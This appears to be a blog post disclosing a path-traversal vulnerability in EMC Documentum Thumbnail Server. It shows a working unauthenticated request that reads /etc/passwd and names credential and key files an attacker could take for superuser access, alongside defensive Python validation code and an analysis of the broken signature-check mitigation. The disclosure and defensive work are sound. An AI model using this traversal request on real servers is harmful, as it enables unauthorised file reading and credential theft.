Beware of Thumbnail Server

This issue was originally filed with EMC on February 8; since I haven't received any feedback, I suppose the issue is considered insignificant and unimportant, so it goes public.

Previously I already wrote that in xCP 2 EMC brought together all the non-popular products in the Documentum product stack (like xPlore, CTS, BAM, BPS, CIS and Thumbnail Server) and made those products mandatory for xCP 2 deployment. For example, below is a quote from the xCP deployment guide:

Unfortunately, in most cases “non-popular” means “more buggy” and “less secure” (what do you think about the inclusion of such products in the product stack? Is it a best practice or not?), and Thumbnail Server proves this opinion. Thumbnail Server accepts only two types of URL:

  • /thumbsrv/getThumbnail?format=msw8&object_type=dm_document&is_vdm=false – retrieves the default document thumbnail
  • /thumbsrv/getThumbnail?path=00038444\80002.jpg&store=thumbnail_store_01&ticket=oiwDnVjAh… – retrieves the real thumbnail of a document

In the second case Thumbnail Server fails to validate the path parameter:

[root@docu70dev01 ~]# GET http://192.168.2.56:8081/thumbsrv/getThumbnail?store=thumbnail_store_01\&path=0001ffd7/../../../../../../../etc/passwd \
> | head
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
[root@docu70dev01 ~]#

i.e. an unauthenticated user is able to retrieve an arbitrary file (dfc.properties with BOF registry credentials, dfc.keystore with the trusted login capability enabled, the AEK file, etc.) from the Content Server filesystem and hence gain superuser privileges.
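The defender-side fix is to treat the path parameter as untrusted and confine it to the store directory. The following Python is an added example, not code from EMC or from Thumbnail Server; it assumes a path shape taken from the URLs shown on this page (hex directory components ending in an image file name), and `resolve_thumbnail_path`, `demo` and the temporary store layout are constructed for illustration:

```python
import os
import re
import tempfile
from typing import Optional

# Expected shape of a thumbnail path, assumed from the examples on this page
# (e.g. 0001ffd7/80/00/02/01.jpg or 00038444\80002.jpg): hex directory
# components and a hex file name with an image extension. Anything else,
# including ".." segments, is rejected before the filesystem is consulted.
_PATH_RE = re.compile(r"^[0-9a-f]{8}(/[0-9a-f]{2,8})*/[0-9a-f]+\.(jpg|jpeg|png|gif)$")


def resolve_thumbnail_path(store_root: str, client_path: str) -> Optional[str]:
    """Map a client-supplied `path` parameter to a file under store_root.

    Returns the absolute path to serve, or None if the request must be refused.
    """
    candidate = client_path.replace("\\", "/")
    if _PATH_RE.fullmatch(candidate) is None:
        return None  # lexical whitelist: wrong shape, traversal segments, NUL bytes, ...
    root = os.path.realpath(store_root)
    resolved = os.path.realpath(os.path.join(root, candidate))
    # Containment check after symlink resolution: a path that passes the regex
    # must still not escape the store (e.g. through a symlink inside the store).
    if os.path.commonpath([root, resolved]) != root:
        return None
    return resolved


def demo() -> dict:
    """Constructed store layout in a temporary directory; returns the decisions made."""
    with tempfile.TemporaryDirectory() as store, tempfile.TemporaryDirectory() as outside:
        thumb_dir = os.path.join(store, "0001ffd7", "80", "00", "02")
        os.makedirs(thumb_dir)
        with open(os.path.join(thumb_dir, "01.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff\xd9")  # constructed, minimal JPEG marker bytes
        # A symlink inside the store that points outside it, to exercise the containment check.
        os.symlink(outside, os.path.join(store, "0001ffd7", "ff"))
        results = {
            "legit": resolve_thumbnail_path(store, "0001ffd7/80/00/02/01.jpg"),
            "traversal": resolve_thumbnail_path(store, "0001ffd7/../../../../../../../etc/passwd"),
            "symlink": resolve_thumbnail_path(store, "0001ffd7/ff/ab.jpg"),
        }
        results["legit_exists"] = results["legit"] is not None and os.path.isfile(results["legit"])
        return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Two layers are used on purpose: the regex rejects the traversal request from the listing above without ever touching the disk, and the realpath containment check covers what a lexical test cannot see, such as a symlink that was placed inside the store. Either layer alone is weaker than the pair.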

To mitigate the attack described above, Thumbnail Server has an option to verify a digital signature over the passed URL parameters (in the Installation Guide this feature is described in the “Providing security for thumbnail requests” paragraph; note that the documentation is a bit outdated). Unfortunately, enabling signature verification does not work properly in recent releases because of the following length constraints: the full URL must not exceed 300 characters, and about 200 characters are required for the ticket parameter, which makes the feature unusable. The documentation doesn't force customers to enable signature verification, and enabling it causes errors for long (more than 10 characters) FQDNs, so it's very unlikely that customers enable this feature:

Connected to Documentum Server running Release 7.0.0140.0644  Linux.Oracle
Session id is s0
API> retrieve,c,dm_store where name='thumbnail_store_01'
...
2801ffd780000101
API> ?,c,select parent_id from dmr_content where storage_id='2801ffd780000101' enable(return_top 10)
parent_id
----------------
...
0901ffd7800ba6d1
..
(10 rows affected)
    
API> ?,c,select thumbnail_url from dm_sysobject(all) where r_object_id='0901ffd7800ba6d1'
thumbnail_url
--------------
http://localhost.localdomain:8081/thumbsrv/getThumbnail?path=....
(1 row affected)
[DM_OBJECT_W_SET_ATTR_STRING_TOO_LONG]warning:  "attempt to assign string of excessive length to attribute 0"
API> exit
Bye
 ~]$ HEAD "http://localhost.localdomain:8081/thumbsrv/getThumbnail?path=0001ffd7/80/00/02/01.jpg&store=thumbnail_store_01&ticket=Nk%2F5pSJtlTp3FlL9V8Og6tExs4cYpNJyG2fy1BEnIGJMPfTP%2FH5aMfIgXKUXNiLa0pJp6t%2FPCHd%2Fi%2F%2BDJpdA0jAkmtB9j%2FdBrBFVr6DlK%2B2EpDVXNRTCLkwsIQ%2B0wTW%2BKda7VhuZwU%2BdXJ4DfGNJ5voziUHB0%2B"
400 Bad Request
Connection: close
Date: Sat, 07 Feb 2015 17:33:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 971
Content-Type: text/html;charset=utf-8
Client-Date: Sat, 07 Feb 2015 17:33:06 GMT
Client-Peer: 127.0.0.1:8081
Client-Response-Num: 1

Related error from Thumbnail Server log files:

SEVERE: getThumbnail: : [DM_TS_E_DECRYPT_TICKET] Exception occured while decrypting ticket 'Nk/5pSJtlTp3FlL9V8Og6tExs4cYpNJyG2fy1BEnIGJMPfTP/H5aMfIgXKUXNiLa0pJp6t/PCHd/i/+DJpdA0jAkmtB9j/dBrBFVr6DlK+2EpDVXNRTCLkwsIQ+0wTW+Kda7VhuZwU+dXJ4DfGNJ5voziUHB0+': null
java.lang.NullPointerException
  at com.rsa.jcm.f.eo.verify(Unknown Source)
  at com.rsa.cryptoj.o.k.engineVerify(Unknown Source)
  at java.security.Signature.verify(Signature.java:592)
  at com.documentum.thumbsrv.getThumbnail.isTicketValid(getThumbnail.java:626)
  at com.documentum.thumbsrv.getThumbnail.doGet(getThumbnail.java:319)
...

The root cause of the above error is that when Content Server returns the value of thumbnail_url it truncates the value to 300 characters (bytes? note the DM_OBJECT_W_SET_ATTR_STRING_TOO_LONG warning in the listing). The valid value of the ticket parameter in this case should be (200 characters):

 ~]$ HEAD "http://localhost.localdomain:8081/thumbsrv/getThumbnail?path=0001ffd7/80/00/02/01.jpg&store=thumbnail_store_01&ticket=Nk%2F5pSJtlTp3FlL9V8Og6tExs4cYpNJyG2fy1BEnIGJMPfTP%2FH5aMfIgXKUXNiLa0pJp6t%2FPCHd%2Fi%2F%2BDJpdA0jAkmtB9j%2FdBrBFVr6DlK%2B2EpDVXNRTCLkwsIQ%2B0wTW%2BKda7VhuZwU%2BdXJ4DfGNJ5voziUHB0%2B%2BFaGUoY9I0NEA%3D"
200 OK
Connection: close
Date: Sat, 07 Feb 2015 17:43:53 GMT
ETag: 0001ffd7/80/00/02/01.jpg
Server: Apache-Coyote/1.1
Content-Length: 3565
Content-Type: image/jpeg
Client-Date: Sat, 07 Feb 2015 17:43:53 GMT
Client-Peer: 127.0.0.1:8081
Client-Response-Num: 1
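To see how the 300-character cut interacts with the 200-character ticket, here is an added Python example (not EMC's or the project's code) that rebuilds the URL from the listings above, applies the cut the way Content Server does, and computes how long a host name can be before the signature is damaged. It assumes the URL layout shown on this page and uses the complete ticket value from the second listing; the function names are my own:

```python
from urllib.parse import parse_qs, quote, urlparse

# Observed on this page: Content Server keeps at most 300 characters of thumbnail_url,
# and a signed ticket is 200 characters once URL-encoded.
THUMBNAIL_URL_LIMIT = 300

# The complete ticket from the listing above (172 base64 characters); the server log
# shows only its first 158 characters because the stored URL was cut off.
FULL_TICKET = (
    "Nk/5pSJtlTp3FlL9V8Og6tExs4cYpNJyG2fy1BEnIGJMPfTP/H5aMfIgXKUXNiLa0pJp6t/PCHd/i/+D"
    "JpdA0jAkmtB9j/dBrBFVr6DlK+2EpDVXNRTCLkwsIQ+0wTW+Kda7VhuZwU+dXJ4DfGNJ5voziUHB0+"
    "+FaGUoY9I0NEA="
)

PAGE_HOST = "localhost.localdomain"
PAGE_PATH = "0001ffd7/80/00/02/01.jpg"
PAGE_STORE = "thumbnail_store_01"


def encode_ticket(ticket: str) -> str:
    # '/', '+' and '=' in base64 must be percent-encoded inside the query string,
    # which is why a 172-character ticket costs 200 characters of URL.
    return quote(ticket, safe="")


def build_thumbnail_url(host: str, path: str, store: str, ticket: str, port: int = 8081) -> str:
    """The URL layout used by thumbnail_url on this page (path is left unencoded, as shown)."""
    return (f"http://{host}:{port}/thumbsrv/getThumbnail"
            f"?path={path}&store={store}&ticket={encode_ticket(ticket)}")


def stored_thumbnail_url(host: str, path: str, store: str, ticket: str,
                         port: int = 8081, limit: int = THUMBNAIL_URL_LIMIT) -> str:
    """What survives in the thumbnail_url attribute after the length cut."""
    return build_thumbnail_url(host, path, store, ticket, port)[:limit]


def ticket_as_received(url: str) -> str:
    """The ticket value Thumbnail Server sees once the container has decoded the query."""
    return parse_qs(urlparse(url).query)["ticket"][0]


def ticket_intact(host: str, path: str, store: str, ticket: str,
                  port: int = 8081, limit: int = THUMBNAIL_URL_LIMIT) -> bool:
    """True only if the stored URL still carries the whole signature."""
    return ticket_as_received(stored_thumbnail_url(host, path, store, ticket, port, limit)) == ticket


def max_host_length(path: str, store: str, ticket: str,
                    port: int = 8081, limit: int = THUMBNAIL_URL_LIMIT) -> int:
    """Longest host name for which the full signed URL fits within the limit."""
    return limit - len(build_thumbnail_url("", path, store, ticket, port))


if __name__ == "__main__":
    full = build_thumbnail_url(PAGE_HOST, PAGE_PATH, PAGE_STORE, FULL_TICKET)
    stored = stored_thumbnail_url(PAGE_HOST, PAGE_PATH, PAGE_STORE, FULL_TICKET)
    print(f"encoded ticket: {len(encode_ticket(FULL_TICKET))} chars, full URL: {len(full)} chars")
    print(f"stored URL: {len(stored)} chars, ticket received: {len(ticket_as_received(stored))} chars")
    print(f"signature intact: {ticket_intact(PAGE_HOST, PAGE_PATH, PAGE_STORE, FULL_TICKET)}")
    print(f"longest host that fits: {max_host_length(PAGE_PATH, PAGE_STORE, FULL_TICKET)} chars")
```

With the page's values the fixed part of the URL (scheme, port, servlet path, the path and store parameters and the parameter names) already takes 97 characters without any host name, so the host gets 3 characters: even "localhost" pushes the URL past 300 and the stored ticket loses its last 14 base64 characters, which is exactly the difference between the ticket in the log and the valid one.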
